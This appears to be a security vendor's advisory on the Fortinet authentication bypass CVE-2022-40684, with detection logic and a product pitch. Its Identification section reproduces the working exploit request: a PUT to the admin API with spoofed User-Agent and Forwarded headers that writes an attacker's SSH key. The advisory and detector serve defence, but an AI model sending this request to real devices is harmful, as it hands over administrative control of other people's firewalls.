
FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)



Application / Appliance Details

FortiOS is Fortinet’s proprietary operating system, used across multiple product lines. FortiProxy is a secure web proxy that protects employees against internet-borne attacks by combining multiple detection techniques. FortiSwitch Manager is an on-premise management platform for the FortiSwitch product.


Vulnerability

Fortinet FortiOS, FortiProxy and FortiSwitchManager could allow a remote attacker to bypass security restrictions using an alternate path or channel vulnerability.


Identification

By sending specially crafted HTTP or HTTPS requests, an attacker could exploit this vulnerability to log into unpatched devices and perform operations on the administrative interface.

PUT /api/v2/cmdb/system/admin/admin
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
 
{ "ssh-public-key1": "ssh-rsa ... dev@devs-MacBook-Pro.local" }

Detection

By turning this request into a traffic file and a matching rule, we are able to detect unauthenticated attempts to bypass authentication on the administrative interface.
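As an added illustration (not Idappcom's signature or traffic file), the Python below sketches the matching logic such a rule encodes: it parses raw HTTP requests and flags writes to the admin API that carry the header combination shown above. The sample requests are constructed; the path, User-Agent and Forwarded values come from the request on this page, and treating the absence of an Authorization header or Cookie as "no session" is an assumption of this sketch.

```python
import re
from typing import Any, Dict, List

# Constructed sample requests (not captures from a real device). The first
# mirrors the request shape shown above; the other two are benign for contrast.
SAMPLES = [
    "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "User-Agent: Report Runner\r\nContent-Type: application/json\r\n"
    'Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";\r\n\r\n'
    '{ "ssh-public-key1": "ssh-rsa <key elided> user@host" }',
    "GET /api/v2/cmdb/system/admin HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Authorization: Bearer <token>\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Cookie: APSCOOKIE_1=<session>\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
    '{ "trusthost1": "198.51.100.0 255.255.255.0" }',
]

ADMIN_API = re.compile(r"^/api/v2/cmdb/system/admin(/|$)")

def parse_request(raw: str) -> Dict[str, Any]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split at the first colon only
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}

def classify(req: Dict[str, Any]) -> List[str]:
    """Return the reasons a request matches the CVE-2022-40684 pattern ([] if none)."""
    reasons: List[str] = []
    headers = req["headers"]
    # Only writes to the admin configuration endpoint are of interest.
    if req["method"] not in ("PUT", "POST") or not ADMIN_API.match(req["path"]):
        return reasons
    if "authorization" not in headers and "cookie" not in headers:  # assumption
        reasons.append("write to admin API with no session or token")
    if headers.get("user-agent") == "Report Runner":
        reasons.append("User-Agent 'Report Runner'")
    if "127.0.0.1" in headers.get("forwarded", ""):
        reasons.append("Forwarded header claiming a loopback client")
    return reasons

def scan(raw_requests: List[str]) -> List[List[str]]:
    """Classify each raw request; a non-empty list means it should be alerted on."""
    return [classify(parse_request(r)) for r in raw_requests]
```

The User-Agent and Forwarded checks fingerprint the request shape shown above and would miss a variant with different header values, so the check for an unauthenticated write to the admin API is the one to keep generic in a production rule.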


Coverage

Idappcom has created signature 8023189 along with a traffic file for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
